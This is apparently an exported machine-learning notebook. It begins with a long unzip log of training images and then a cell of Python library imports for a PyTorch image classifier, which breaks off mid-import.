inflating: input/train_images/2021244568.jpg
inflating: input/train_images/2489350383.jpg
inflating: input/train_images/2385423168.jpg
inflating: input/train_images/4211138249.jpg
inflating: input/train_images/1635544822.jpg
inflating: input/train_images/302898400.jpg
inflating: input/train_images/736834551.jpg
inflating: input/train_images/1643552654.jpg
inflating: input/train_images/3110035366.jpg
inflating: input/train_images/1595577438.jpg
inflating: input/train_images/1674922822.jpg
inflating: input/train_images/1688478980.jpg
inflating: input/train_images/6103.jpg
inflating: input/train_images/825551560.jpg
inflating: input/train_images/582179912.jpg
inflating: input/train_images/1575013487.jpg
inflating: input/train_images/1017006970.jpg
inflating: input/train_images/1398572814.jpg
inflating: input/train_images/3442867405.jpg
inflating: input/train_images/1442249007.jpg
inflating: input/train_images/135834998.jpg
inflating: input/train_images/3903538298.jpg
inflating: input/train_images/2877008433.jpg
inflating: input/train_images/2222831550.jpg
inflating: input/train_images/3125050696.jpg
inflating: input/train_images/336299725.jpg
inflating: input/train_images/3435885572.jpg
inflating: input/train_images/1575521049.jpg
inflating: input/train_images/2403083568.jpg
inflating: input/train_images/2371237551.jpg
inflating: input/train_images/189585547.jpg
inflating: input/train_images/3323965689.jpg
inflating: input/train_images/1741967088.jpg
inflating: input/train_images/1494726462.jpg
inflating: input/train_images/3793827107.jpg
inflating: input/train_images/2242503873.jpg
inflating: input/train_images/29130164.jpg
inflating: input/train_images/2194916526.jpg
inflating: input/train_images/814185128.jpg
inflating: input/train_images/4006579451.jpg
inflating: input/train_images/3924061539.jpg
inflating: input/train_images/4192202317.jpg
inflating: input/train_images/2917486619.jpg
inflating: input/train_images/3368457880.jpg
inflating: input/train_images/830772376.jpg
inflating: input/train_images/3784391347.jpg
inflating: input/train_images/3548679387.jpg
inflating: input/train_images/3701689199.jpg
inflating: input/train_images/543312121.jpg
inflating: input/train_images/3096059384.jpg
inflating: input/train_images/607840807.jpg
inflating: input/train_images/610094717.jpg
inflating: input/train_images/1422694007.jpg
inflating: input/train_images/993366541.jpg
inflating: input/train_images/1657763940.jpg
inflating: input/train_images/2019941140.jpg
inflating: input/train_images/3743464955.jpg
inflating: input/train_images/12688038.jpg
inflating: input/train_images/3623190050.jpg
inflating: input/train_images/3170957509.jpg
inflating: input/train_images/3791562105.jpg
inflating: input/train_images/1271525915.jpg
inflating: input/train_images/2649484487.jpg
inflating: input/train_images/4221848010.jpg
inflating: input/train_images/2058959882.jpg
inflating: input/train_images/4046068592.jpg
inflating: input/train_images/3644657668.jpg
inflating: input/train_images/2055261864.jpg
inflating: input/train_images/2443428424.jpg
inflating: input/train_images/1653535676.jpg
inflating: input/train_images/744972013.jpg
inflating: input/train_images/3068359463.jpg
inflating: input/train_images/3664934784.jpg
inflating: input/train_images/2156883044.jpg
inflating: input/train_images/3292555378.jpg
inflating: input/train_images/1176894803.jpg
inflating: input/train_images/1291065002.jpg
inflating: input/train_images/2236610037.jpg
inflating: input/train_images/2051048628.jpg
inflating: input/train_images/1059213340.jpg
inflating: input/train_images/972622677.jpg
inflating: input/train_images/491673903.jpg
inflating: input/train_images/4131457294.jpg
inflating: input/train_images/3333666077.jpg
inflating: input/train_images/2734186624.jpg
inflating: input/train_images/3403835665.jpg
inflating: input/train_images/3598395242.jpg
inflating: input/train_images/357823942.jpg
inflating: input/train_images/2437048705.jpg
inflating: input/train_images/2432364538.jpg
inflating: input/train_images/3304581364.jpg
inflating: input/train_images/1564583746.jpg
inflating: input/train_images/1923179851.jpg
inflating: input/train_images/1098441542.jpg
inflating: input/train_images/2844800744.jpg
inflating: input/train_images/3576795584.jpg
inflating: input/train_images/605816056.jpg
inflating: input/train_images/3632711020.jpg
inflating: input/train_images/3523363514.jpg
inflating: input/train_images/3613817114.jpg
inflating: input/train_images/3365264596.jpg
inflating: input/train_images/931943521.jpg
inflating: input/train_images/3277182366.jpg
inflating: input/train_images/2588469356.jpg
inflating: input/train_images/4172480899.jpg
inflating: input/train_images/2888640560.jpg
inflating: input/train_images/920229727.jpg
inflating: input/train_images/4121566836.jpg
inflating: input/train_images/1946046925.jpg
inflating: input/train_images/2578576273.jpg
inflating: input/train_images/1687852669.jpg
inflating: input/train_images/1408639438.jpg
inflating: input/train_images/1851047251.jpg
inflating: input/train_images/4177391802.jpg
inflating: input/train_images/1544151022.jpg
inflating: input/train_images/157014347.jpg
inflating: input/train_images/2462876995.jpg
inflating: input/train_images/572515769.jpg
inflating: input/train_images/3942244753.jpg
inflating: input/train_images/4250885951.jpg
inflating: input/train_images/1040079282.jpg
inflating: input/train_images/1679233615.jpg
inflating: input/train_images/4054246073.jpg
inflating: input/train_images/1633652647.jpg
inflating: input/train_images/3454772304.jpg
inflating: input/train_images/3384300864.jpg
inflating: input/train_images/3728053314.jpg
inflating: input/train_images/144301620.jpg
inflating: input/train_images/4213525466.jpg
inflating: input/train_images/1189155349.jpg
inflating: input/train_images/3902366551.jpg
inflating: input/train_images/3406720343.jpg
inflating: input/train_images/1925077855.jpg
inflating: input/train_images/3604705495.jpg
inflating: input/train_images/1700921498.jpg
inflating: input/train_images/3175679586.jpg
inflating: input/train_images/3921328805.jpg
inflating: input/train_images/1803764964.jpg
inflating: input/train_images/1486873366.jpg
inflating: input/train_images/3356619304.jpg
inflating: input/train_images/2990902039.jpg
inflating: input/train_images/1092772509.jpg
inflating: input/train_images/1750580369.jpg
inflating: input/train_images/3640609321.jpg
inflating: input/train_images/747770020.jpg
inflating: input/train_images/3702249794.jpg
inflating: input/train_images/4283521063.jpg
inflating: input/train_images/2721303722.jpg
inflating: input/train_images/1278246781.jpg
inflating: input/train_images/1698429014.jpg
inflating: input/train_images/4044329664.jpg
inflating: input/train_images/897925605.jpg
inflating: input/train_images/3991445025.jpg
inflating: input/train_images/1350898322.jpg
inflating: input/train_images/627068686.jpg
inflating: input/train_images/4206288054.jpg
inflating: input/train_images/3959033347.jpg
inflating: input/train_images/2549684718.jpg
inflating: input/train_images/3943363815.jpg
inflating: input/train_images/3305068232.jpg
inflating: input/train_images/3912538989.jpg
inflating: input/train_images/1768185229.jpg
inflating: input/train_images/652624585.jpg
inflating: input/train_images/149791608.jpg
inflating: input/train_images/1694314252.jpg
inflating: input/train_images/324248837.jpg
inflating: input/train_images/551716959.jpg
inflating: input/train_images/2837753620.jpg
inflating: input/train_images/1710828726.jpg
inflating: input/train_images/3672364441.jpg
inflating: input/train_images/1031500522.jpg
inflating: input/train_images/1162809006.jpg
inflating: input/train_images/1290189931.jpg
inflating: input/train_images/2657104946.jpg
inflating: input/train_images/2702330830.jpg
inflating: input/train_images/3986218390.jpg
inflating: input/train_images/2321458.jpg
inflating: input/train_images/790568397.jpg
inflating: input/train_images/2725369010.jpg
inflating: input/train_images/3248325951.jpg
inflating: input/train_images/442743258.jpg
inflating: input/train_images/2176153898.jpg
inflating: input/train_images/1420352773.jpg
inflating: input/train_images/553195372.jpg
inflating: input/train_images/2212089862.jpg
inflating: input/train_images/163947288.jpg
inflating: input/train_images/561647799.jpg
inflating: input/train_images/1049791378.jpg
inflating: input/train_images/2292197107.jpg
inflating: input/train_images/700664783.jpg
inflating: input/train_images/3943338687.jpg
inflating: input/train_images/1900666535.jpg
inflating: input/train_images/338729354.jpg
inflating: input/train_images/3504889993.jpg
inflating: input/train_images/2260738205.jpg
inflating: input/train_images/3223282866.jpg
inflating: input/train_images/630797550.jpg
inflating: input/train_images/4286174060.jpg
inflating: input/train_images/3320071514.jpg
inflating: input/train_images/2612899548.jpg
inflating: input/train_images/2242351929.jpg
inflating: input/train_images/3761713726.jpg
inflating: input/train_images/2152051451.jpg
inflating: input/train_images/2187716233.jpg
inflating: input/train_images/2433307411.jpg
inflating: input/train_images/2833869009.jpg
inflating: input/train_images/2703773318.jpg
inflating: input/train_images/2512300453.jpg
inflating: input/train_images/550691642.jpg
inflating: input/train_images/1373499412.jpg
inflating: input/train_images/3324881806.jpg
inflating: input/train_images/1281155236.jpg
inflating: input/train_images/3957562076.jpg
inflating: input/train_images/3356800378.jpg
inflating: input/train_images/476858432.jpg
inflating: input/train_images/3561069837.jpg
inflating: input/train_images/3834284991.jpg
inflating: input/train_images/601644904.jpg
inflating: input/train_images/1740309612.jpg
inflating: input/train_images/1238821861.jpg
inflating: input/train_images/1164692375.jpg
inflating: input/train_images/798006612.jpg
inflating: input/train_images/3139351952.jpg
inflating: input/train_images/621367062.jpg
inflating: input/train_images/1787178614.jpg
inflating: input/train_images/1227161199.jpg
inflating: input/train_images/3451871229.jpg
inflating: input/train_images/36508013.jpg
inflating: input/train_images/1454850686.jpg
inflating: input/train_images/2045580929.jpg
inflating: input/train_images/1721634086.jpg
inflating: input/train_images/3779724069.jpg
inflating: input/train_images/2529358101.jpg
inflating: input/train_images/2174309008.jpg
inflating: input/train_images/3486487741.jpg
inflating: input/train_images/3816412484.jpg
inflating: input/train_images/2686776292.jpg
inflating: input/train_images/1317487445.jpg
inflating: input/train_images/549750394.jpg
inflating: input/train_images/447048984.jpg
inflating: input/train_images/2074319088.jpg
inflating: input/train_images/187343662.jpg
inflating: input/train_images/181355439.jpg
inflating: input/train_images/1556497496.jpg
inflating: input/train_images/2791918976.jpg
inflating: input/train_images/1009361983.jpg
inflating: input/train_images/3452080171.jpg
inflating: input/train_images/2727816974.jpg
inflating: input/train_images/1655615998.jpg
inflating: input/train_images/3413220258.jpg
inflating: input/train_images/3238426139.jpg
inflating: input/train_images/957437817.jpg
inflating: input/train_images/3318282640.jpg
inflating: input/train_images/1810295906.jpg
inflating: input/train_images/527923260.jpg
inflating: input/train_images/3029026599.jpg
inflating: input/train_images/2397511243.jpg
inflating: input/train_images/523467512.jpg
inflating: input/train_images/2189140444.jpg
inflating: input/train_images/2893140493.jpg
inflating: input/train_images/1515921207.jpg
inflating: input/train_images/2017329516.jpg
inflating: input/train_images/3231201573.jpg
inflating: input/train_images/123865158.jpg
inflating: input/train_images/391853550.jpg
inflating: input/train_images/1383579851.jpg
inflating: input/train_images/3792533899.jpg
inflating: input/train_images/3617067141.jpg
inflating: input/train_images/623333046.jpg
inflating: input/train_images/3559981218.jpg
inflating: input/train_images/3426035333.jpg
inflating: input/train_images/1345964218.jpg
inflating: input/train_images/1951270318.jpg
inflating: input/train_images/440896922.jpg
inflating: input/train_images/1142600361.jpg
inflating: input/train_images/1258505000.jpg
inflating: input/train_images/2452364106.jpg
inflating: input/train_images/2164681780.jpg
inflating: input/train_images/2267434559.jpg
inflating: input/train_images/954749288.jpg
inflating: input/train_images/2293810835.jpg
inflating: input/train_images/1799764071.jpg
inflating: input/train_images/519373224.jpg
inflating: input/train_images/3376905285.jpg
inflating: input/train_images/31398935.jpg
inflating: input/train_images/459566440.jpg
inflating: input/train_images/3609925731.jpg
inflating: input/train_images/3910162936.jpg
inflating: input/train_images/425235104.jpg
inflating: input/train_images/1728004537.jpg
inflating: input/train_images/823276084.jpg
inflating: input/train_images/3485849218.jpg
inflating: input/train_images/1345258060.jpg
inflating: input/train_images/2906227978.jpg
inflating: input/train_images/1533935132.jpg
inflating: input/train_images/892025744.jpg
inflating: input/train_images/2657169592.jpg
inflating: input/train_images/57149651.jpg
inflating: input/train_images/2382758285.jpg
inflating: input/train_images/2442102115.jpg
inflating: input/train_images/3194870771.jpg
inflating: input/train_images/495190803.jpg
inflating: input/train_images/3884199625.jpg
inflating: input/train_images/432371484.jpg
inflating: input/train_images/235258659.jpg
inflating: input/train_images/3705669883.jpg
inflating: input/train_images/77379532.jpg
inflating: input/train_images/3769167654.jpg
inflating: input/train_images/3672629086.jpg
inflating: input/train_images/3803823261.jpg
inflating: input/train_images/70656521.jpg
inflating: input/train_images/725027388.jpg
inflating: input/train_images/3905145362.jpg
inflating: input/train_images/69803851.jpg
inflating: input/train_images/1996862654.jpg
inflating: input/train_images/3556675221.jpg
inflating: input/train_images/7830631.jpg
inflating: input/train_images/3528647821.jpg
inflating: input/train_images/4019771530.jpg
inflating: input/train_images/3820517266.jpg
inflating: input/train_images/2003067998.jpg
inflating: input/train_images/3738618109.jpg
inflating: input/train_images/871333676.jpg
inflating: input/train_images/854773586.jpg
inflating: input/train_images/4004133979.jpg
inflating: input/train_images/3712064465.jpg
inflating: input/train_images/3384250377.jpg
inflating: input/train_images/2091940865.jpg
inflating: input/train_images/1435182915.jpg
inflating: input/train_images/4263534897.jpg
inflating: input/train_images/2094357697.jpg
inflating: input/train_images/3212523761.jpg
inflating: input/train_images/4057359447.jpg
inflating: input/train_images/353518711.jpg
inflating: input/train_images/1745296302.jpg
inflating: input/train_images/2668524110.jpg
inflating: input/train_images/534784883.jpg
inflating: input/train_images/3758838047.jpg
inflating: input/train_images/284270936.jpg
inflating: input/train_images/2079104179.jpg
inflating: input/train_images/1206025945.jpg
inflating: input/train_images/240469234.jpg
inflating: input/train_images/207893947.jpg
inflating: input/train_images/1433061380.jpg
inflating: input/train_images/3567260259.jpg
inflating: input/train_images/724302384.jpg
inflating: input/train_images/1823721668.jpg
inflating: input/train_images/3207910782.jpg
inflating: input/train_images/999329392.jpg
inflating: input/train_images/563348054.jpg
inflating: input/train_images/414363375.jpg
inflating: input/train_images/2154249381.jpg
inflating: input/train_images/2854519294.jpg
inflating: input/train_images/3305821160.jpg
inflating: input/train_images/3645419540.jpg
inflating: input/train_images/2365265934.jpg
inflating: input/train_images/3341706471.jpg
inflating: input/train_images/2565456267.jpg
inflating: input/train_images/2241394681.jpg
inflating: input/train_images/2756642189.jpg
inflating: input/train_images/128594927.jpg
inflating: input/train_images/2650949618.jpg
inflating: input/train_images/1831917433.jpg
inflating: input/train_images/473823142.jpg
inflating: input/train_images/2173229407.jpg
inflating: input/train_images/2698282165.jpg
inflating: input/train_images/3542768898.jpg
inflating: input/train_images/1926981545.jpg
inflating: input/train_images/1208216776.jpg
inflating: input/train_images/4147991798.jpg
inflating: input/train_images/2750295170.jpg
inflating: input/train_images/3713964400.jpg
inflating: input/train_images/3924602971.jpg
inflating: input/train_images/2051629821.jpg
inflating: input/train_images/3406705095.jpg
inflating: input/train_images/1157584839.jpg
inflating: input/train_images/1966061216.jpg
inflating: input/train_images/1938730022.jpg
inflating: input/train_images/2252678193.jpg
inflating: input/train_images/2666373738.jpg
inflating: input/train_images/3151577248.jpg
inflating: input/train_images/1854790191.jpg
inflating: input/train_images/4170665280.jpg
inflating: input/train_images/326839479.jpg
inflating: input/train_images/3500204258.jpg
inflating: input/train_images/1335214678.jpg
inflating: input/train_images/2045675044.jpg
inflating: input/train_images/53615554.jpg
inflating: input/train_images/2569083558.jpg
inflating: input/train_images/745442190.jpg
inflating: input/train_images/3579980941.jpg
inflating: input/train_images/2103659900.jpg
inflating: input/train_images/304408360.jpg
inflating: input/train_images/3410015128.jpg
inflating: input/train_images/3495009786.jpg
inflating: input/train_images/178079419.jpg
inflating: input/train_images/4156956690.jpg
inflating: input/train_images/691285209.jpg
inflating: input/train_images/3190980772.jpg
inflating: input/train_images/2946977526.jpg
inflating: input/train_images/2095602074.jpg
inflating: input/train_images/3298994120.jpg
inflating: input/train_images/2116662197.jpg
inflating: input/train_images/4202441426.jpg
inflating: input/train_images/824321777.jpg
inflating: input/train_images/3140362576.jpg
inflating: input/train_images/2207440318.jpg
inflating: input/train_images/226557134.jpg
inflating: input/train_images/2484530081.jpg
inflating: input/train_images/1983454737.jpg
inflating: input/train_images/3653076658.jpg
inflating: input/train_images/4183866544.jpg
inflating: input/train_images/2178767483.jpg
inflating: input/train_images/2138403170.jpg
inflating: input/train_images/898386629.jpg
inflating: input/train_images/239724736.jpg
inflating: input/train_images/4135889078.jpg
inflating: input/train_images/1218546888.jpg
inflating: input/train_images/3443846811.jpg
inflating: input/train_images/3365267863.jpg
inflating: input/train_images/1510579448.jpg
inflating: input/train_images/4146003606.jpg
inflating: input/train_images/494596361.jpg
inflating: input/train_images/2484602563.jpg
inflating: input/train_images/1815972967.jpg
inflating: input/train_images/3576823132.jpg
inflating: input/train_images/2620251115.jpg
inflating: input/train_images/1053009170.jpg
inflating: input/train_images/2610411314.jpg
inflating: input/train_images/1542373427.jpg
inflating: input/train_images/512575634.jpg
inflating: input/train_images/3306255309.jpg
inflating: input/train_images/2220309469.jpg
inflating: input/train_images/2273730548.jpg
inflating: input/train_images/535314273.jpg
inflating: input/train_images/2707336069.jpg
inflating: input/train_images/379548308.jpg
inflating: input/train_images/2189576451.jpg
inflating: input/train_images/557774617.jpg
inflating: input/train_images/2757539730.jpg
inflating: input/train_images/2976035478.jpg
inflating: input/train_images/3647297248.jpg
inflating: input/train_images/544346867.jpg
inflating: input/train_images/1220118716.jpg
inflating: input/train_images/3815135505.jpg
inflating: input/train_images/1775001723.jpg
inflating: input/train_images/396499078.jpg
inflating: input/train_images/2663749229.jpg
inflating: input/train_images/309569120.jpg
inflating: input/train_images/4102729978.jpg
inflating: input/train_images/2018165733.jpg
inflating: input/train_images/1643576810.jpg
inflating: input/train_images/1291178007.jpg
inflating: input/train_images/3957819631.jpg
inflating: input/train_images/3389583925.jpg
inflating: input/train_images/2653588387.jpg
inflating: input/train_images/2384181550.jpg
inflating: input/train_images/2594282701.jpg
inflating: input/train_images/4288418406.jpg
inflating: input/train_images/1355462312.jpg
inflating: input/train_images/314599917.jpg
inflating: input/train_images/2628555515.jpg
inflating: input/train_images/1332855741.jpg
inflating: input/train_images/4221104214.jpg
inflating: input/train_images/1446871248.jpg
inflating: input/train_images/2083878392.jpg
inflating: input/train_images/3511671285.jpg
inflating: input/train_images/651123589.jpg
inflating: input/train_images/2421566220.jpg
inflating: input/train_images/368553798.jpg
inflating: input/train_images/1974079097.jpg
inflating: input/train_images/412390858.jpg
inflating: input/train_images/3917185101.jpg
inflating: input/train_images/2225817818.jpg
inflating: input/train_images/3608578044.jpg
inflating: input/train_images/3854923530.jpg
inflating: input/train_images/2795551857.jpg
inflating: input/train_images/1733354827.jpg
inflating: input/train_images/376932028.jpg
inflating: input/train_images/3203412332.jpg
inflating: input/train_images/815702740.jpg
inflating: input/train_images/1680657766.jpg
inflating: input/train_images/4127132722.jpg
inflating: input/train_images/2082251851.jpg
inflating: input/train_images/3442647074.jpg
inflating: input/train_images/3684209409.jpg
inflating: input/train_images/147604859.jpg
inflating: input/train_images/1873100849.jpg
inflating: input/train_images/3814035701.jpg
inflating: input/train_images/3869030734.jpg
inflating: input/train_images/1567877420.jpg
inflating: input/train_images/619658845.jpg
inflating: input/train_images/2378984273.jpg
inflating: input/train_images/2214228898.jpg
inflating: input/train_images/3205016772.jpg
inflating: input/train_images/494558399.jpg
inflating: input/train_images/573039129.jpg
inflating: input/train_images/2710440557.jpg
inflating: input/train_images/3192657039.jpg
inflating: input/train_images/3570121717.jpg
inflating: input/train_images/1898437154.jpg
inflating: input/train_images/1302078468.jpg
inflating: input/train_images/1483743890.jpg
inflating: input/train_images/657424989.jpg
inflating: input/train_images/159031113.jpg
inflating: input/train_images/3652093161.jpg
inflating: input/train_images/1998363687.jpg
inflating: input/train_images/1968596086.jpg
inflating: input/train_images/1009322597.jpg
inflating: input/train_images/1972409682.jpg
inflating: input/train_images/4089218356.jpg
inflating: input/train_images/2600500593.jpg
inflating: input/train_images/1960063101.jpg
inflating: input/train_images/2016371750.jpg
inflating: input/train_images/1063110047.jpg
inflating: input/train_images/3662018109.jpg
inflating: input/train_images/2514350663.jpg
inflating: input/train_images/3219439906.jpg
inflating: input/train_images/700464495.jpg
inflating: input/train_images/3192692419.jpg
inflating: input/train_images/3719058586.jpg
inflating: input/train_images/1194042617.jpg
inflating: input/train_images/3747440776.jpg
inflating: input/train_images/2895326283.jpg
inflating: input/train_images/265181391.jpg
inflating: input/train_images/3856769685.jpg
inflating: input/train_images/4009888434.jpg
inflating: input/train_images/1512350296.jpg
inflating: input/train_images/641590483.jpg
inflating: input/train_images/2514394316.jpg
inflating: input/train_images/1631620098.jpg
inflating: input/train_images/2907723622.jpg
inflating: input/train_images/1314553833.jpg
inflating: input/train_images/3566226674.jpg
inflating: input/train_images/1077138637.jpg
inflating: input/train_images/1083021605.jpg
inflating: input/train_images/1150608601.jpg
inflating: input/train_images/2713091649.jpg
inflating: input/train_images/2797611751.jpg
inflating: input/train_images/1525852725.jpg
inflating: input/train_images/3658178204.jpg
inflating: input/train_images/117226420.jpg
inflating: input/train_images/441408374.jpg
inflating: input/train_images/910617288.jpg
inflating: input/train_images/744676370.jpg
inflating: input/train_images/2462241027.jpg
inflating: input/train_images/4060346540.jpg
inflating: input/train_images/2292154193.jpg
inflating: input/train_images/2457737762.jpg
inflating: input/train_images/1262742218.jpg
inflating: input/train_images/972840038.jpg
inflating: input/train_images/631563709.jpg
inflating: input/train_images/3914082089.jpg
inflating: input/train_images/3934216826.jpg
inflating: input/train_images/1131545521.jpg
inflating: input/train_images/3988748153.jpg
inflating: input/train_images/3633505917.jpg
inflating: input/train_images/207761661.jpg
inflating: input/train_images/2086061590.jpg
inflating: input/train_images/2272721188.jpg
inflating: input/train_images/2148834762.jpg
inflating: input/train_images/3317706044.jpg
inflating: input/train_images/3115055353.jpg
inflating: input/train_images/2995689898.jpg
inflating: input/train_images/2875351329.jpg
inflating: input/train_images/3586867158.jpg
inflating: input/train_images/1906831443.jpg
inflating: input/train_images/568949064.jpg
inflating: input/train_images/2742350070.jpg
inflating: input/train_images/2878480561.jpg
inflating: input/train_images/4186680625.jpg
inflating: input/train_images/2056154613.jpg
inflating: input/train_images/3435254116.jpg
inflating: input/train_images/3484566225.jpg
inflating: input/train_images/3120725353.jpg
inflating: input/train_images/3192892221.jpg
inflating: input/train_images/1670109260.jpg
inflating: input/train_images/3589849323.jpg
inflating: input/train_images/813060428.jpg
inflating: input/train_images/1033403106.jpg
inflating: input/train_images/3078123533.jpg
inflating: input/train_images/2800642069.jpg
inflating: input/train_images/1705724767.jpg
inflating: input/train_images/817366566.jpg
inflating: input/train_images/2876605372.jpg
inflating: input/train_images/3211443011.jpg
inflating: input/train_images/2810787386.jpg
inflating: input/train_images/3027251380.jpg
inflating: input/train_images/1545341197.jpg
inflating: input/train_images/2648991795.jpg
inflating: input/train_images/3302044032.jpg
inflating: input/train_images/2754537497.jpg
inflating: input/train_images/3945332868.jpg
inflating: input/train_images/3058243587.jpg
inflating: input/train_images/2856404486.jpg
inflating: input/train_images/2059048377.jpg
inflating: input/train_images/681211585.jpg
inflating: input/train_images/4290607578.jpg
inflating: input/train_images/1454944435.jpg
inflating: input/train_images/1649231975.jpg
inflating: input/train_images/4290883718.jpg
inflating: input/train_images/1844847808.jpg
inflating: input/train_images/107466550.jpg
inflating: input/train_images/248540513.jpg
inflating: input/train_images/1744118582.jpg
inflating: input/train_images/3247553763.jpg
inflating: input/train_images/2241778439.jpg
inflating: input/train_images/3675829567.jpg
inflating: input/train_images/1664825517.jpg
inflating: input/train_images/1040828572.jpg
inflating: input/train_images/705928796.jpg
inflating: input/train_images/2807875042.jpg
inflating: input/train_images/2198414004.jpg
inflating: input/train_images/1595866872.jpg
inflating: input/train_images/181157076.jpg
inflating: input/train_images/3523670880.jpg
inflating: input/train_images/1300599354.jpg
inflating: input/train_images/3731510435.jpg
inflating: input/train_images/1956034762.jpg
inflating: input/train_images/3088191583.jpg
inflating: input/train_images/3052959460.jpg
inflating: input/train_images/2330534234.jpg
inflating: input/train_images/4188219605.jpg
inflating: input/train_images/2275525608.jpg
inflating: input/train_images/2577068353.jpg
inflating: input/train_images/673931298.jpg
inflating: input/train_images/1482562306.jpg
inflating: input/train_images/2943495695.jpg
inflating: input/train_images/2863474549.jpg
inflating: input/train_images/1903950320.jpg
inflating: input/train_images/2095589836.jpg
inflating: input/train_images/4027944552.jpg
inflating: input/train_images/2852147190.jpg
inflating: input/train_images/4151340541.jpg
inflating: input/train_images/2665470851.jpg
inflating: input/train_images/3023855128.jpg
inflating: input/train_images/268372107.jpg
inflating: input/train_images/1997488168.jpg
inflating: input/train_images/3289230042.jpg
inflating: input/train_images/3389713573.jpg
inflating: input/train_images/2417374571.jpg
inflating: input/train_images/2274065917.jpg
inflating: input/train_images/794895924.jpg
inflating: input/train_images/1667727245.jpg
inflating: input/train_images/4034495674.jpg
inflating: input/train_images/2486687383.jpg
inflating: input/train_images/3413149507.jpg
inflating: input/train_images/1249688756.jpg
inflating: input/train_images/3643428044.jpg
inflating: input/train_images/3217927386.jpg
inflating: input/train_images/1946306561.jpg
inflating: input/train_images/3223218079.jpg
inflating: input/train_images/2408821742.jpg
inflating: input/train_images/390092040.jpg
inflating: input/train_images/431535307.jpg
inflating: input/train_images/2394770217.jpg
inflating: input/train_images/391364557.jpg
inflating: input/train_images/2840988158.jpg
inflating: input/train_images/4000584857.jpg
inflating: input/train_images/1397439068.jpg
inflating: input/train_images/2832723542.jpg
inflating: input/train_images/1904646699.jpg
inflating: input/train_images/1343777320.jpg
inflating: input/train_images/3850927712.jpg
inflating: input/train_images/582352615.jpg
inflating: input/train_images/2130379306.jpg
inflating: input/train_images/3316874782.jpg
inflating: input/train_images/2043115778.jpg
inflating: input/train_images/1544234863.jpg
inflating: input/train_images/700971789.jpg
inflating: input/train_images/1442268656.jpg
inflating: input/train_images/3083319765.jpg
inflating: input/train_images/2179057801.jpg
inflating: input/train_images/1442929249.jpg
inflating: input/train_images/2098716407.jpg
inflating: input/train_images/1910478563.jpg
inflating: input/train_images/3638291703.jpg
inflating: input/train_images/3211907814.jpg
inflating: input/train_images/61492497.jpg
inflating: input/train_images/1814763610.jpg
inflating: input/train_images/131746797.jpg
inflating: input/train_images/3656998236.jpg
inflating: input/train_images/2213150889.jpg
inflating: input/train_images/2291300428.jpg
inflating: input/train_images/2736444451.jpg
inflating: input/train_images/1681857148.jpg
inflating: input/train_images/2519147193.jpg
inflating: input/train_images/1185369128.jpg
inflating: input/train_images/4018307313.jpg
inflating: input/train_images/1987438093.jpg
inflating: input/train_images/2141260400.jpg
inflating: input/train_images/506080526.jpg
inflating: input/train_images/3939103661.jpg
inflating: input/train_images/3806878671.jpg
inflating: input/train_images/925945591.jpg
inflating: input/train_images/3490253996.jpg
inflating: input/train_images/2916268128.jpg
inflating: input/train_images/2466684931.jpg
inflating: input/train_images/1348221044.jpg
inflating: input/train_images/630798966.jpg
inflating: input/train_images/1834263937.jpg
inflating: input/train_images/1247742333.jpg
inflating: input/train_images/1279535323.jpg
inflating: input/train_images/760863006.jpg
inflating: input/train_images/1687514090.jpg
inflating: input/train_images/3141049473.jpg
inflating: input/train_images/52672633.jpg
inflating: input/train_images/4046910331.jpg
inflating: input/train_images/3375224217.jpg
inflating: input/train_images/3668854435.jpg
inflating: input/train_images/518719429.jpg
inflating: input/train_images/2861545981.jpg
inflating: input/train_images/3883954527.jpg
inflating: input/train_images/4225259568.jpg
inflating: input/train_images/2967863031.jpg
inflating: input/train_images/550742055.jpg
inflating: input/train_images/1703538353.jpg
inflating: input/train_images/717532306.jpg
inflating: input/train_images/3232846318.jpg
inflating: input/train_images/3863840044.jpg
inflating: input/train_images/3829295052.jpg
inflating: input/train_images/1756754615.jpg
inflating: input/train_images/2203540560.jpg
inflating: input/train_images/2694971765.jpg
inflating: input/train_images/3153618395.jpg
inflating: input/train_images/2869465595.jpg
inflating: input/train_images/2573573471.jpg
inflating: input/train_images/2498112851.jpg
inflating: input/train_images/1092232758.jpg
inflating: input/train_images/2240579189.jpg
inflating: input/train_images/996539252.jpg
inflating: input/train_images/1999438235.jpg
inflating: input/train_images/2188616846.jpg
inflating: input/train_images/4022980210.jpg
inflating: input/train_images/1991345445.jpg
inflating: input/train_images/3182540417.jpg
inflating: input/train_images/216687816.jpg
inflating: input/train_images/1988989222.jpg
inflating: input/train_images/1645330578.jpg
inflating: input/train_images/4011808410.jpg
inflating: input/train_images/1075249116.jpg
inflating: input/train_images/2224409184.jpg
inflating: input/train_images/1357774593.jpg
inflating: input/train_images/842973014.jpg
inflating: input/train_images/1699816187.jpg
inflating: input/train_images/3989761123.jpg
inflating: input/train_images/125088495.jpg
inflating: input/train_images/1050774063.jpg
inflating: input/train_images/3876777651.jpg
inflating: input/train_images/334728567.jpg
inflating: input/train_images/4274049119.jpg
inflating: input/train_images/3929446886.jpg
inflating: input/train_images/807698612.jpg
inflating: input/train_images/174581727.jpg
inflating: input/train_images/1613918546.jpg
inflating: input/train_images/382849332.jpg
inflating: input/train_images/687753518.jpg
inflating: input/train_images/3880993061.jpg
inflating: input/train_images/775831061.jpg
inflating: input/train_images/3852521.jpg
inflating: input/train_images/4160459669.jpg
inflating: input/train_images/857983591.jpg
inflating: input/train_images/3646458335.jpg
inflating: input/train_images/2458353661.jpg
inflating: input/train_images/3345535790.jpg
inflating: input/train_images/2823421970.jpg
inflating: input/train_images/319927039.jpg
inflating: input/train_images/725034194.jpg
inflating: input/train_images/3088061893.jpg
inflating: input/train_images/1615166642.jpg
inflating: input/train_images/1133741600.jpg
inflating: input/train_images/224402404.jpg
inflating: input/train_images/3738228775.jpg
inflating: input/train_images/3779096121.jpg
inflating: input/train_images/504065374.jpg
  inflating: input/train_images/... (unzip log truncated; thousands of identical lines, one per extracted training image)
 extracting: input/sample_submission.csv
###Markdown
Library
###Code
# ====================================================
# Library
# ====================================================
import os
import datetime
import math
import time
import random
import shutil
from pathlib import Path
from contextlib import contextmanager
from collections import defaultdict, Counter
import scipy as sp
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import preprocessing
from sklearn.metrics import accuracy_score
from sklearn.model_selection import StratifiedKFold
from tqdm.auto import tqdm
from functools import partial
import cv2
from PIL import Image
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.optim import Adam, SGD
import torchvision.models as models
from torch.nn.parameter import Parameter
from torch.utils.data import DataLoader, Dataset
from torch.optim.lr_scheduler import CosineAnnealingWarmRestarts, CosineAnnealingLR, ReduceLROnPlateau
from albumentations import (
